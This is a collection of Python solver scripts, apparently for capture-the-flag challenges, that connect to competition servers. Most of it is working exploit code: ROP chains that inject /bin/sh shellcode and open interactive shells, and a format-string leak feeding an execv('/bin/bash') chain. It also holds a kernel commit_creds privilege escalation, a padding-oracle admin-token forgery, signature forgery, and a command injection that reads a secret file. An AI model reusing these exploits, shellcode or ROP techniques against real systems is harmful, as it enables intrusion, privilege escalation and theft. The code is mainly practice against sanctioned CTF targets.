def alberry(ctx): with Connection('10.210.17.68', 12345) as conn: target = struct.pack('<I', 0x0011578) if 0: conn.send(target * 20 + b'\n') conn.interactive() raw_buf = 0x9A8A0 raw_buf = 0x9A89c shellcode = b'\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x78\x46\x07\x30\x01\x30\x01\x90\x01\xa9\x92\x1a\x0b\x27\x01\xdf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00' shellcode = b'\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58' shellcode = open('./res.bin', 'rb').read() gets_addr = 0x019EAc pop_r0_r4_pc = 0x000294bc pop_pc = 0x00059978 payload = struct.pack('<I', pop_pc) * 10 payload += struct.pack('<III', pop_r0_r4_pc, raw_buf, 0) payload += struct.pack('<IIIII', gets_addr, 0, 0, 0, 0) payload += struct.pack('<I', raw_buf) #assert payload.find(b'\n') == -1 #assert shellcode.find(b'\n') == -1 #print('laaa') conn.send(payload + b'\n') conn.send(shellcode + b'\n') conn.send('ls\n') conn.interactive()
def go(ctx): with Connection('abc.eatpwnnosleep.com', 55555, logfile='./conn.log') as conn: for itx in range(100): print('ON ITER ', itx) conn.logfile_obj.flush() px = cmisc.TwoPatternMatcher(f'[*] TRY {itx+1}/100', '[!] Fail!') conn.recv_until(px) if px.b_check: print('FAIL on ', itx - 1) return r = conn.recv_until('[?]').decode() lines = r.splitlines() data = [] print(r) for line in lines: if not line.startswith('[') and line: data.append(line) fname = f'{ctx.rundir}/f_{ctx.runid}_{itx}.bin' with open(fname, 'wb') as f: f.write(base64.b64decode(get_uniq(data))) patches = solve(fname) conn.send(fmt_patches(patches)) print(conn.recv_timeout(2))
class Solver(ExitStack): def __init__(self): super().__init__() self.conn = Connection('arcade.fluxfingers.net', 1821) def __enter__(self): super().__enter__() self.enter_context(self.conn) self.conn.recv_until('Possible Oracles') return self def get_ans(self): res= self.conn.recv_until('Possible Oracles').decode() m = re.search('Ciphertext is (.+)', res) return base64.b64decode(m.group(1)) def do_xor(self, a): self.conn.send(f'XOR\n{a:x}\n') return self.get_ans() def do_add(self, a): self.conn.send(f'ADD\n{a:x}\n') return self.get_ans()
def client(ctx): r = get_ratchet(ctx) with Connection(ctx.host, ctx.port) as conn: for msg in ('jambon', REQ_FLAG, 'kappa', 'abc'): data = r.prepare_send_message(msg) conn.send(data + b'\x00') ans = conn.recv_until(b'\x00')[:-1] message = r.on_recv_message(ans) print('Received response to ', msg, 'is', message)
def client(ctx): r = get_ratchet(ctx) with Connection(ctx.host, ctx.port) as conn: for i in range(300): msg = random.choice(('jambon', 'kappa', 'abc', 'a', 'b', 'c', 'd')) data = r.prepare_send_message(msg) conn.send(data + b'\x00') ans = conn.recv_until(b'\x00')[:-1] message = r.on_recv_message(ans) print('Received response to ', msg, 'is', message)
def test(ctx): if 0: for i in range(200): with Connection('arcade.fluxfingers.net', 1822) as conn: order = 79182553273022138539034276599687 print('ADDINg ', i) data = dict(x=542342417109300762922401936535663978, y=726821508217691654812343977365180386, c=0xdead + order * i, d=0xbeef, groupID='jambon') print(data) conn.send_padded(json.dumps(data) + '\n', 8192) with Connection('arcade.fluxfingers.net', 1822) as conn: ndata = dict(x=167579391684973268008976899398162142, y=112257816371615265563133215310271332, c=0xdeaf, d=0xbeff, groupID='jambon') conn.send_padded(json.dumps(ndata) + '\n', 8192) conn.interactive()
def test(ctx): shellcode = open('./shellcode.out', 'rb').read() with Connection('arcade.fluxfingers.net', 1807) as conn: addr = 0xbb+1 bp = 3 conn.send(f'{addr:x}\n') conn.send(f'{bp:x}\n') conn.recv_until('Enter the Key') assert len(shellcode) == 0x2e conn.send(shellcode) conn.interactive()
def test(ctx): with Connection('finale-docker.rtfm.re', 10000) as conn: data = conn.recv_until('Your actual') m = re.search('width : ([0-9]+) - height : ([0-9]+)', data.decode()) width = int(m.group(1)) height = int(m.group(2)) print(width, height) res = conn.recv_until('>') m = re.search('x : ([0-9]+) - y : ([0-9]+)', res.decode()) x = int(m.group(1)) y = int(m.group(2)) mp = -np.ones((width, height), dtype=int) def get_new(action): conn.send(action + '\n') res = conn.recv_until(')').decode() m = re.search('\(([0-9]+) - ([0-9]+)\)', res) x = int(m.group(1)) y = int(m.group(2)) return res.find('OK -') != -1, x, y vx = [-1, 1, 0, 0] vy = [0, 0, 1, -1] mp[x, y] = 0 vs = 'WENS' q = [[x, y, 0, -1]] while len(q) > 0: x, y, i, prev = q[-1] if i == 4: q.pop(len(q) - 1) assert get_new(vs[prev ^ 1]) continue q[-1][2] += 1 nx, ny = x + vx[i], y + vy[i] if mp[nx, ny] != -1: continue ok, ex, ey = get_new(vs[i]) if ok: print(ex, ey) assert ex == nx and ey == ny mp[nx, ny] = 0 q.append([nx, ny, 0, i]) else: mp[nx, ny] = 1 go(x, y)
def test(ctx): print('on test') prepare_creds = 0xffffffff8104ed20 commit_creds = 0xffffffff8104e9d0 zero_gadget = 0xffffffff81000000 + 0x00000000000dd773 print(prepare_creds) print(commit_creds) print(hex(zero_gadget)) data = 0xffff88000212d240 print(zero_gadget) with Connection('arcade.fluxfingers.net', 1817) as conn: client = Client(conn) credaddr = client.call(prepare_creds, 0) for i in range(5): client.call(zero_gadget, credaddr + 0x14 + i * 8) client.call(commit_creds, credaddr) conn.interactive()
def go(): fil = FIL tag, cmd = open(fil, 'r').read().rstrip().split(':') cmd = binascii.a2b_base64(cmd) blocks = [cmd[x:x+16] for x in range(0, len(cmd), 16)] print(blocks) prefix = 'self.request.send(open("./secret", "r").read()+"\\n<<EOF")\n' prefix += '\n'*(16-len(prefix) % 16) prefix = prefix.encode() forged_cmd = prefix+prefix+cmd data = tag.encode()+b':'+binascii.b2a_base64(forged_cmd) with Connection('localhost', 4324) as conn: conn.send(data) time.sleep(1) print(conn.recv_until(lambda x: x.find(b"<<EOF")))
def test(ctx): if 0: x = permv(1) v0=nf ** (nr) vbase = -keystream.offset % nf v = vbase + v0 * x #print(keystream.rasta_standard(keystream.key, keystream.rounds, keystream.n, v0, M)) print(keystream.rasta_standard(keystream.key, keystream.rounds, keystream.n, v, M)) return with Connection('arcade.fluxfingers.net', 1820) as conn: s = Solver(conn) reslist =[s.query_last(i) for i in range(keystream.n)] data = cmisc.Attributize() data.reslist = reslist data.chall = s.chall pickle.dump(data, open(flags.data_file, 'wb'))
def test(ctx): print('on test') with Connection('finale-docker.rtfm.re', 6969) as conn: def recv_profile(): content = conn.recv_until('\n\n').decode() data = [] for line in content.split('\n'): pos = line.find(': ') if pos == -1: continue rem = line[pos + 2:] if rem == 'oui': rem = 1 elif rem == 'non': rem = 0 else: rem = float(rem) data.append(rem) return data train = [] for i in range(1500): train.append(recv_profile()) train = np.array(train) train_y = train[:, -1] train_x = train[:, :-1] print(train_y) clf = GradientBoostingClassifier(n_estimators=100, learning_rate=1.0, max_depth=2, random_state=0).fit(train_x, train_y) #sigsegv{I_L0v3_Tent4cl3s} for i in range(500): u = recv_profile() res = clf.predict(np.array(u)[None, :]) conn.send('NO'[int(res[0])] + '\n') conn.interactive()
def test2(): n = 128 key = [random.randint(0, 2 * n - 1) for i in range(n)] analyse(key) server = 'wob-key-e1g2l93c.9447.plumbing' port = 9447 while True: try: with Connection(server, port) as conn: if 1: pow(conn) oracle = ServerOracle(conn) solver = Solver(oracle, n) key = solver.go() true_oracle = TrueOracle(key) oracle.chall(true_oracle) break except Exception as e: print('failed', e) tb.print_exc() pass
def main(): if 1: patch() return print(host, port) with Connection(host, port) as s: cnds=[] n=8 nx=len(alnum_list) T=0 H=(len(alnum_list)**n)-1 while T<=H: M=(T+H)//2 s.send('admin\n') buf=b'' v=M for i in range(n): buf+=alnum_list[v%nx] v//=nx buf=buf[::-1] s.send(buf+b'\n') print('on iter ', T, H, buf) res=s.recv_until(PatternMatcher.fromre(b'error code=(1|-1)|Successfully')) if res.find(b'Successfully')!=-1: print('found for ', buf) T=M break else: print(res) m=re.search(b'error code=(1|-1)', res) assert m if int(m.group(1))==1: T=M+1 else: H=M-1
def doit(): with Connection('localhost', 4445) as conn: token, roomnum = step1(conn) conn.recv_until('AND YOUR TOKEN') def query(rn, data): tt = base64.b64encode(data).decode() tmp = conn.send_and_expect(f'{rn}|{tt}\n', 'AND YOUR TOKEN') return tmp.find(b'ACCESS GRANTED') != -1, tmp tbin0 = bytearray(base64.b64decode(token)) debug_room = None for rn in roomnum: print('QUERY ROOM ', rn) _, res = query(rn, tbin0) if res.find(b'WELCOME TO ROOM "DEBUG"') != -1: debug_room = rn break print('DEBUG ROMO ">> ', debug_room) def q_padding(data): _, tmp = query(debug_room, data) return tmp.find(b'Invalid padding') == -1 oracle = PaddingOracle(q_padding) print(len(tbin0)) #res = oracle.recover_msg(tbin0) print(res) admin_token = b'{"guid": "dc5928bd15b87de8b3335f67e6712444", "level": "ADMIN"}' enc_token = oracle.encode(admin_token) print(query(roomnum[0], enc_token)) return
def test1(): cmd = "print 'bonjour'; kappa jmabon\n" data = test_sign(cmd) with Connection('localhost', 4324) as conn: conn.send(data)
def hack_client(ctx): local_pk = load(open(f'./public-data/bob.key', 'rb')) remote_pk = load(open(f'./public-data/alice.key', 'rb')) lsig = SignatureScheme(None, local_pk) rsig = SignatureScheme(None, remote_pk) ratchet = make_ratchet(lsig, rsig) import glob msgs = glob.glob('./public-data/messages/b2a*') msgs.sort() data = {} tb = [] hl = 256 for msg_id, msg_fname in enumerate(msgs): content = open(msg_fname, 'rb').read() signed_data, signature = content.rsplit(b"|", 1) h = lsig.hash2(signed_data, msg_id + 1) data[msg_id + 1] = [h, signed_data, protocol.decode_int(signature)] tb.append( [np.array(h, dtype='object'), protocol.decode_int(signature)]) #signature_valid = lsig.verify(data, protocol.decode_int(signature)) #assert signature_valid N = local_pk.n fk = local_sig(ctx) last_sig = tb[-1][1] def inv(x): ix = gmpy2.invert(x, N) assert x * ix % N == 1 return ix for i in range(1, len(tb)): tb[-i][1] = tb[-i][1] * inv(tb[-i - 1][1]) % N for i, (h, x) in enumerate(tb): v = fk.sk.r for j in range(hl): if h[j] == 1: v = v * fk.sk.s[j] % N v = pow(v, 2**i, N) assert v == x, i mat = [] last = tb[-1] tb = tb[:-1] n = len(tb) tmp = [] hlist = [] for i in range(n): x = inv(pow(tb[i][1], 2**(n - i), N)) * last[1] % N hdiff = last[0] - tb[i][0] tmp.append([x, hdiff]) hlist.append(list(hdiff)) #print(list(hdiff)) for dumping to sage json.dump(hlist, open('./mat.data', 'w')) if 0: return data = Attributize(json.load(open('./tsf.data', 'r'))) print(data.base) slast = 1 for i, (u, v) in enumerate(data.make_unimodular): slast = gmpy2.powmod(slast, u, N) * gmpy2.powmod( tmp[data.base[i]][0], v, N) % N scoeffs = [1] * hl scoeffs[0] = slast for i in range(1, hl): scoeffs[i] = tmp[data.mat_id[i - 1]][0] if 0: for have, hdiff in tmp: x = 1 for j, v in enumerate(hdiff): x = x * gmpy2.powmod(fk.sk.s[j], (2**(n)) * v, N) % N assert x == have sexpr = [0] * hl if 1: for i in range(hl): print('processing ', i) cur = 1 for j in range(hl): cur = cur * gmpy2.powmod(scoeffs[j], data.imat[i][j], N) % N sexpr[i] = cur assert cur == (gmpy2.powmod(fk.sk.s[i], 2**n, N)) else: for i in range(hl): sexpr[i] = pow(fk.sk.s[i], 2**(n), N) r = pow(fk.sk.r, 2**(n), N) r = last[1] for i in range(hl): if last[0][i]: r = r * inv(sexpr[i]) % N ratchet.remote_public_element = 1 public_element, iv, ciphertext = ratchet._encrypt_message(REQ_FLAG) public_element = 1 signed_data = protocol.encode_int( public_element, 256) + b"|" + protocol.encode_int( iv, 16) + b"|" + protocol.encode_bytes(ciphertext) nmsg_id = n + 2 nh = lsig.hash2(signed_data, nmsg_id) print(nh) forged_sig = r for i, v in enumerate(nh): if v: forged_sig = forged_sig * sexpr[i] forged_sig = forged_sig * forged_sig * last_sig % N data = signed_data + b"|" + protocol.encode_int(forged_sig, 256) with Connection(ctx.host, ctx.port) as conn: conn.send(data + b'\x00') res = conn.recv_until(b'\x00')[:-1] ratchet.public_element = 1 flagans = ratchet.on_recv_message(res, hack=True) print(flagans)
def run(): with Connection('localhost', 17171) as conn: with Process('./build/gitzino/distribute/gitzino_solve query', shell=True) as oracle: x = Server(conn, oracle) x.solve()
def solve(): remote = 1 if remote: conn = Connection('52.6.64.173', 4545) else: conn = Process('./ebp') with conn as x: data = '' for i in range(60): data += '{}:%08x '.format(i + 1) data += '-1END\n' x.send(data.encode()) res = x.recv_until(PatternMatcher.frombytes(b'END\n')) res = res.decode() tb = [x.split(':') for x in res.split(' ')] tb.pop() tb = {int(x[0]): int(x[1], 16) for x in tb} print(res) global id_base_addr id_base_addr = tb[4] - 0x18 - 0xc - 3 * 4 g_int80 = 0xf761fa63 - 0xf7584979 + tb[44] mk = tb[12] & 0xffff if not mk < 0x300: return False expected_exit_off = 0xf7621150 - 0xf7619979 + tb[44] print('cxa should be at >> ', hex(expected_exit_off)) y = X86Machine(0) print(hex(tb[44])) #disp_ins(x, y,tb[44]-libc_id_off, 20) if 0: c = code.InteractiveConsole(locals=dict(locals(), **globals())) c.interact() return if 0: while True: try: data = input('next addr? ') data = data.split(' ') addr = int(data[0], 16) n = int(data[1]) res = do_read(x, addr, n) print(res) #disp_ins(x, y, addr, n) except KeyboardInterrupt: raise except Exception as e: print(traceback.print_exc()) pass libc_start = tb[44] - 9 if remote: execv_off = 0x9b100 else: execv_off = 0x000b3140 - 0x00018570 g_execv = libc_start + execv_off g_pop3 = 0x80485dd need_write = (tb[12] - 0x20) & 0xffff target = tb[12] & ~0xffff target_start = 0x340 target += target_start g_pop1 = 0x8048385 rop = RopBuilder(target, 4) rop.add('I', tb[12]) rop.add('II{I:_ref_path}{I:_ref_argv}{I:_ref_env}', g_execv, 0) rop.add('{#argv}{I:_ref_path}{#env}I', 0) rop.add('{#path}{"/bin/bash}?', 0) buf = rop.get() print(buf) for i in range(len(buf)): write_ctrl_addr(x, target + i) write_addr(x, buf[i]) write_ctrl_addr(x, tb[4] - 0x20) disp(x) input('final write') write_addr(x, target_start, buf, 0) c = code.InteractiveConsole(locals=dict(locals(), **globals())) c.interact() time.sleep(1) res = x.recv(1024) print(res) res = x.recv(1024) print(res) res = x.recv(1024) print(res) res = x.recv(1024) print(res) input('finish') return True
def hack_client(ctx): local_pk = load(open(f'./public-data/bob.key', 'rb')) remote_pk = load(open(f'./public-data/alice.key', 'rb')) lsig = SignatureScheme(None, local_pk) rsig = SignatureScheme(None, remote_pk) r = make_ratchet(lsig, rsig) import glob msgs = glob.glob('./public-data/messages/b2a*') msgs.sort() data = {} tb = [] for msg_id, msg_fname in enumerate(msgs): content = open(msg_fname, 'rb').read() signed_data, signature = content.rsplit(b"|", 1) h = lsig.hash2(signed_data, msg_id + 1) data[msg_id + 1] = [h, signed_data, protocol.decode_int(signature)] tb.append([h, protocol.decode_int(signature)]) print(tb[-1]) print() #signature_valid = lsig.verify(data, protocol.decode_int(signature)) #assert signature_valid N = local_pk.n hl = 256 fk = local_sig(ctx) last_sig = tb[-1][1] def inv(x): ix = gmpy2.invert(x, N) assert x * ix % N == 1 return ix for i in range(1, len(tb)): tb[-i][1] = tb[-i][1] * inv(tb[-i - 1][1]) % N last = tb[-1] tb = tb[:-1] n = len(tb) tmp = [] for i in range(n): x = inv(pow(tb[i][1], 2**(hl * (n - i)), N)) * last[1] % N hdiff = last[0] - tb[i][0] tmp.append([x, hdiff]) sel1 = tmp[-1] sel2 = None for cnd in tmp: if gmpy2.gcd(tmp[-1][1], cnd[1]) == 1: sel2 = cnd break else: assert 0 d, u, v = gmpy2.gcdext(sel1[1], sel2[1]) if u < 0: sel1[0] = inv(sel1[0]) u = -u if v < 0: sel2[0] = inv(sel2[0]) v = -v spw = pow(sel1[0], u, N) * pow(sel2[0], v, N) % N expected = pow(fk.sk.s, 2**(hl * n), N) rpw = last[1] * gmpy2.powmod(spw, -last[0], N) % N r.remote_public_element = 1 public_element, iv, ciphertext = r._encrypt_message(REQ_FLAG) public_element = 1 signed_data = protocol.encode_int( public_element, 256) + b"|" + protocol.encode_int( iv, 16) + b"|" + protocol.encode_bytes(ciphertext) nmsg_id = n + 2 nh = lsig.hash2(signed_data, nmsg_id) print(nh, nmsg_id, signed_data) forged_sig = last_sig * pow(rpw * pow(spw, nh, N), 2**hl, N) % N print(forged_sig) data = signed_data + b"|" + protocol.encode_int(forged_sig, 256) with Connection(ctx.host, ctx.port) as conn: conn.send(data + b'\x00') res = conn.recv_until(b'\x00')[:-1] r.public_element = 1 flagans = r.on_recv_message(res, hack=True) print(flagans)
def __init__(self): super().__init__() self.conn = Connection('arcade.fluxfingers.net', 1821)
#!/usr/bin/env python import sys from chdrft.tube.connection import Connection data = b''' int main() { write(1, "hi", 2); } ''' data += b'a' * 256 data += b'\n' data += b'\x03' with Connection( 'crippled_f7fddee5e137122934909141e7d3f728.quals.shallweplayaga.me', 11111) as c: c.send(data) print(c.recv(1024)) print(c.recv(1024)) print(c.recv(1024))
def main(): with Connection('school.fluxfingers.net', 1513) as conn: data = get_data(conn) print(data) solve(conn, *data)
def main(): dsa = DSA.generate(512) data = [dsa.key.y, dsa.key.g, dsa.key.p, dsa.key.q] data_str = ','.join(map(str, data)) chunk_size = 64 chunks = [] for i in range((len(data_str) + chunk_size - 1) // chunk_size): tmp = data_str[64 * i:64 * i + 64].encode() chunks.append(binascii.b2a_hex(server_pub_enc.encrypt2(tmp)[0])) enc_key = b','.join(chunks) n = 0x345080e693fa74f29d5ccac2f13556bea2541231949e14d7cd86068e5adcbc3d5622936f770fab224beea0da967057fdd9cd8419561c77445fa8b358720afc9f3703acc4b3b6901140587d83477fd271d3499797f9582bb1a5c985804ff905055cc4efecedd70cacc219ca3ba49537d6268ab66aa1c639c1963e089f3a63aac9b8b n = 0x167c731ae38435961bd5322b2b0ec685027147d194b8096fc2bcadacbece96d29b11c93dff0417644387aaca8cbdaa3bc895fd787c8fed999c19efcda1b0603b79370e675fc3a7e5536c8b07566b845a2fb513735d7ddb5051d04fe129eae00f17896ca892087388249b4e68acf46ed6938338a03b3a542b2c20f861cbc86eab10751 n = 0x3ada6f51c3e3009b4b63bb14b710624f321248b12741559e29a487eaaa05167dfd9f712e1825769ba612595b81945e0def05c379cc11a4419a3bfa00f14c6ca43ec21306955fc16621025898b59219cc1c4e0474719dbc715f9c31344c9af39a3d954fedc39651f244ee2c333fe257125a97d4db45135b53eb2383714f302bcf6b6 n = 0x29b32eb59e7ee1c467e1cc952af0d531d9d3128fbd6aecab8394fddc016e7786267b212bdaf6d343fef51a7a8ebec644c65d040f70b99e5a5c570024328431d17800ecd478bcb6fb92c0dfd76fd7cea637d9317c1cdd90b9b30f548daa7e39fb5a9d289246e4b90ec665e797bc76587d4d19e2edb2e6269621910f83b17726240de12c18e69a n = 0xc56f3ad5b3eca2ea9920c4fb01a84bf6538e2a5dd9f776a9fa1b22590a8609bb4a03ed13c7c07aa82d792c5676c8296381518838b03444079604b88b1d5048d2da88c036201c1599da302532b94a0ba9902750748d491bbfb1c0da674b6cbba0c1fb6bb693080eabdd0c7096757c8b80fe8ca6d82cb1bc5151a30fa40f9ea982675b1 k = RSA.construct((n, 12)) x = PKCS1_OAEP.new(k) assert len(sys.argv) > 1 with Connection(remote, remote_port) as conn, Process(sys.argv[1]) as proc: print('ENCRYPT MOFO') try: len_sig = len(x.encrypt2(b'kfwefappa')[1]) except: print('EJSUS FAIL') raise print('ENCRYPT MOFO') sent_sig = 'YOU KAPPA F**K' prefix = '\x00' * (len_sig - len(sent_sig)) sig = prefix + sent_sig sig = sig.encode() db = [] y = Oracle(proc) y.send_num(hex(n)[2:].encode()) odd_max = 2 if 0: for i in range(0, odd_max): s = get_guess_for(i) print('ON STEP >> ', i) nbit = 10 for A in range(2**nbit): s2 = '' for j in range(nbit): if A >> j & 1: s2 += ' ' else: s2 += '\n' s2 = s + s2 gen = x.encrypt2(s2.encode())[1] print(gen) print(hex(n)) work = gen res = y.get(sig, work) if res: db.append(res) break else: assert False else: db.append([ b'a0fbbacc479a8a3af09aebdbb9ae30834a10699d9d618108514d88f308161577809ae60e182c75e0f95797806179363a4c17da900373a3879ac3a692dc5f8f8b1e022eee294dd7013858394fa2f366179f64c9ab0ff28c89b3a78b1a6b6a8852de7a3f5de4dbe6ae0667941e8283f4c3eaa22572cc4dd4dceef54251bd3cf4690d301', b'2a1fed419b80c8145524c84c9c1f2efdf598d18da0eecfd2892a8956358827e613cf05c505e9b902277727c889a7ff32ea0b4bbe018fc8acc33743cfa14d31597a0e879135edc1257c8815208817dc7f6ed470c4e75742890ec7f7604c7025afa4f0f6193e3df2925320553ea1c9be3982369dd2b35b2b858fc7ea029e132693e355' ]) db.append([ b'42de041b5d51a89aa133a02dcb108a0714344d6cd0e23cee44d0e64a7c03fcd7163a8195f106ab8664215d9d13efa63871189ddbf25a7aedb1803c6ae5d8c75bd3aa78ac934f68ff1b55d4984bd66b8e79d1b490d553f1f0b3d93c04101e78603e94e5577f6525f934bef8016497820831e9e6a4571e446334a98e1b9d99f015a1735', b'70f611574824ae1ca492657f842feb2fea44283f7e7cc1da42997df2a54402975a490b9ca3990c95536c93c317976d7db1c844575b5f3f12bd9cc4f83808f31635749dd58da1b4cb392b08131766472895db3beb16f5317f4477a0df71f84c22de477066ce0bc4468df5a68e2527390c561c8c177b823f824b6926acf17599447f509' ]) print('sending') conn.trash(1) conn.send(enc_key) while True: time.sleep(0.5) pattern = b'You have \$([0-9]+)\)\n' res = conn.recv_until(PatternMatcher.fromre(pattern)) monies = int(re.search(pattern, res).group(1)) assert res conn.send('{}\n'.format(monies)) conn.recv_until(PatternMatcher.frombytes(b'At what odds')) conn.send('{}\n'.format(odd_max)) conn.recv_until(PatternMatcher.frombytes(b'Alright, what is your')) send_with_sig(dsa, conn, binascii.b2a_hex(sig)) res = conn.recv_until( PatternMatcher.frombytes(b'Now what is your')) rng = re.search(b'the secure RNG is ([0-9]+)\n', res).group(1).decode() rng = int(rng) print('rng is >> ', rng) want = rng % odd_max uu = get_rsa_key_from_db(n, db[want]) print(uu) privkey = PKCS1_OAEP.new(RSA.importKey(uu)) guess = privkey.decrypt(sig) guess = int(guess[len("I hereby commit to a guess of "):]) send_with_sig(dsa, conn, uu)